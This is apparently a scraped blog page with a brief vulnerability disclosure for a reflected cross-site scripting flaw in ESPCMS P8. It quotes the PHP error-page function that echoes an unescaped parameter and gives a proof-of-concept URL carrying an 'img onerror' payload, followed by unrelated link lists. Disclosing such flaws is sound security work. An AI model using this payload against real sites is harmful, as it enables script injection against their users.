Download the source code first

In the directory espcms_web\espcms_load.php line 67

if (!is_file($module_filename)) {

    espcms_message_err('public_pack-espcms_module_file_err', array($ac_name));

}

Will return the html code directly

function espcms_message_err($message_code, $format_code = array()) {

    $title = espcms_lan_pack('public_pack-espcms_soft_title_err');

    $message_lan = espcms_lan_pack($message_code);

    if (isset($message_lan) && !empty($message_lan) && is_array($format_code) && count($format_code) > 0) {

        $message = vsprintf($message_lan, $format_code);

    } else {

        $message = $message_lan;

    }

    $message_html_code = '<!DOCTYPE html>

    <html xmlns="http://www.w3.org/1999/xhtml" dir=\'ltr\'>

    <head>

        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

        <title>' . $title . '</title>

        <script type="text/javascript" src="' . ESPCMS_ADMIN_URL . 'js/jquery.min.js"></script>

        <script type="text/javascript" src="' . ESPCMS_ADMIN_URL . 'js/iframeResizer.contentWindow.min.js"></script>

        <style type="text/css">

            html {

                background: #eee;

            }

            body {

                background: #fff;

                color: #333;

                font-family: "Open Sans", sans-serif;

                margin: 2em auto;

                padding: 20px;

                max-width: 92%;

                -webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.13);

                box-shadow: 0 1px 3px rgba(0,0,0,0.13);

            }

            h1 {

                border-bottom: 1px solid #dadada;

                clear: both;

                color: #666;

                font: 24px "Open Sans", sans-serif;

                margin: 30px 0 0 0;

                padding: 0;

                padding-bottom: 7px;

            }

            #error-page {

                margin-top:40px;

            }

            #error-page p {

                font-size: 14px;

                line-height: 1.5;

                margin: 25px 0 20px;

            }

            #error-page code {

                font-family: Consolas, Monaco, monospace;

            }

            ul li {

                margin-bottom: 10px;

                font-size: 14px ;

            }

            a {

                color: #333;

                text-decoration: underline;

            }

            a:hover {

                color: #fa0000;

                text-decoration: underline;

            }

            .button {

                background: #f7f7f7;

                border: 1px solid #cccccc;

                color: #555;

                display: inline-block;

                text-decoration: none;

                font-size: 13px;

                line-height: 26px;

                height: 28px;

                margin: 0;

                padding: 0 10px 1px;

                cursor: pointer;

                -webkit-border-radius: 3px;

                -webkit-appearance: none;

                border-radius: 3px;

                white-space: nowrap;

                -webkit-box-sizing: border-box;

                -moz-box-sizing:    border-box;

                box-sizing:         border-box;

                -webkit-box-shadow: inset 0 1px 0 #fff, 0 1px 0 rgba(0,0,0,.08);

                box-shadow: inset 0 1px 0 #fff, 0 1px 0 rgba(0,0,0,.08);

                vertical-align: top;

            }

            .button.button-large {

                height: 29px;

                line-height: 28px;

                padding: 0 12px;

            }

            .button:hover,

            .button:focus {

                background: #fafafa;

                border-color: #999;

                color: #222;

            }

            .button:focus  {

                -webkit-box-shadow: 1px 1px 1px rgba(0,0,0,.2);

                box-shadow: 1px 1px 1px rgba(0,0,0,.2);

            }

            .button:active {

                background: #eee;

                border-color: #999;

                color: #333;

                -webkit-box-shadow: inset 0 2px 5px -3px rgba( 0, 0, 0, 0.5 );

                box-shadow: inset 0 2px 5px -3px rgba( 0, 0, 0, 0.5 );

            }

            code {

                font-size:14px;padding:0px 5px;color:#eb3609;

            }

        </style>

    </head>

    <body id="error-page">' . $message . '</body></html>';

    exit($message_html_code);

}

Directly cause cross-site scripting

We request directly

http://127.0.0.1/espcms/index.php?ac=<img src=1 onerror=alert(1)>&at=List

ESPCMS P8 stable version Front-end reflective xss的更多相关文章

  1. nginx的Mainline version、Stable version、Legacy version

    Nginx官网提供了三个类型的版本Mainline version:Mainline 是 Nginx 目前主力在做的版本,可以说是开发版Stable version:最新稳定版,生产环境上建议使用的版 ...

  2. nginx的MainLine version、Stable version、Legacy versions

    Nginx的版本说明Mainline version:在线版本,正处于开发状态Stable version :稳定版本(一般下载使用)Legacy version :遗留版本,遗留的老的版本 Linu ...

  3. nginx的Mainline version、Stable version、Legacy version的版本区别

    nginx的Mainline version.Stable version.Legacy version的版本区别 创建时间:2014-01-16 10:30:37最后修改:2014-09-23 20 ...

  4. Thymeleaf 3.0.9.RELEASE is the current stable version. It requires Java SE 6 or newer.

    Thymeleaf 3.0.9.RELEASE is the current stable version. It requires Java SE 6 or newer. Release date: ...

  5. espcms P8.19082801 vulnerability

    author: naiquan chai Net name:Hanamizuki花水木 Through  the vulnerability  we can get the webshell if w ...

  6. 编译安装redis-3.2.9(latest stable version)

    What is the Redis? Redis is an open source (BSD licensed), in-memory data structure store, used as a ...

  7. Mainline/Stable/Legacy

    Nginx官网提供了三个类型的版本Mainline version:Mainline 是 Nginx 目前主力在做的版本,可以说是开发版Stable version:最新稳定版,生产环境上建议使用的版 ...

  8. 一个新的Android Studio 2.3.3可以在稳定的频道中使用。A new Android Studio 2.3.3 is available in the stable channel.

    作者:韩梦飞沙 Author:han_meng_fei_sha 邮箱:313134555@qq.com E-mail: 313134555 @qq.com 一个新的Android Studio 2.3 ...

  9. Nginx官方版本说明##Mainline &Stable&Legacy versions

    Nginx (Mainline Stable Legacy)区别 Nginx官网提供了三个类型的版本Mainline version:Mainline 是 Nginx 目前主力在做的版本,可以说是开发 ...

随机推荐

  1. 基于VMware Workstation下Windows server的搭建

    网络安全学习内容 一.VMware安装Windows系统   1.1安装配置虚拟机 需要提前准备的东西: 配置网络实验室的IP: 为了满足实验中一些需要用到网络的需求,学校为我们提供了每个人学号密码的 ...

  2. 为什么QQ能帮你找到失散多年的兄弟?----图论

    编程三分钟的第 44 篇原创文章 为什么qq里"可能认识的人"功能推荐的如此精准? 为什么两个没有什么联系的朋友会相互认识? 一切的背后到底是道德的沦丧,还是人性的扭曲 ? 让我们 ...

  3. 使用Docker测试静态网站

    参考书籍 :第一本docker书[澳]James Turnbull  1.Sample网站的初始Dockerfile 文件目录如下: Dockerfile文件代码: 安装nginx 在容器中创建一个目 ...

  4. luogu P2824 [HEOI2016/TJOI2016]排序

    题目描述 在2016年,佳媛姐姐喜欢上了数字序列.因而他经常研究关于序列的一些奇奇怪怪的问题,现在他在研究一个难题,需要你来帮助他.这个难题是这样子的:给出一个1到n的全排列,现在对这个全排列序列进行 ...

  5. GitHub 上值得参考的完整的 iOS-App 源码

    转自:https://www.zhihu.com/question/28518265 作者:wjh2005链接:https://www.zhihu.com/question/28518265/answ ...

  6. Prometheus笔记(一)metric type

    欢迎加入go语言学习交流群 636728449 Prometheus笔记(二)监控go项目实时给grafana展示 Prometheus笔记(一)metric type 文章目录 Prometheus ...

  7. 测试工程师有福啦!一键生成api文档及测试功能

    最近发现一个比较好用的插件,可根据api的功能注释说明一键生成文档以及功能demo: swaggerUI 是一个简单的Restful API 测试和文档工具.简单.漂亮.易用.通过读取JSON 配置显 ...

  8. 基于Java语言的IO操作(文件复制)

    public static void main(String[] args) { //获取复制开始前系统时间毫秒值 long start=System.currentTimeMillis(); //文 ...

  9. ACM小组的古怪象棋

    Description ACM小组的Samsara和Staginner对中国象棋特别感兴趣,尤其对马(可能是因为这个棋子的走法比较多吧)的使用进行深入研究.今天他们又在 构思一个古怪的棋局:假如Sam ...

  10. numpy的基本API(二)——维数操作

    numpy的基本维数操作API iwehdio的博客园:https://www.cnblogs.com/iwehdio/ 1.np.copyto(dst, src) copyto方法将数组src复制到 ...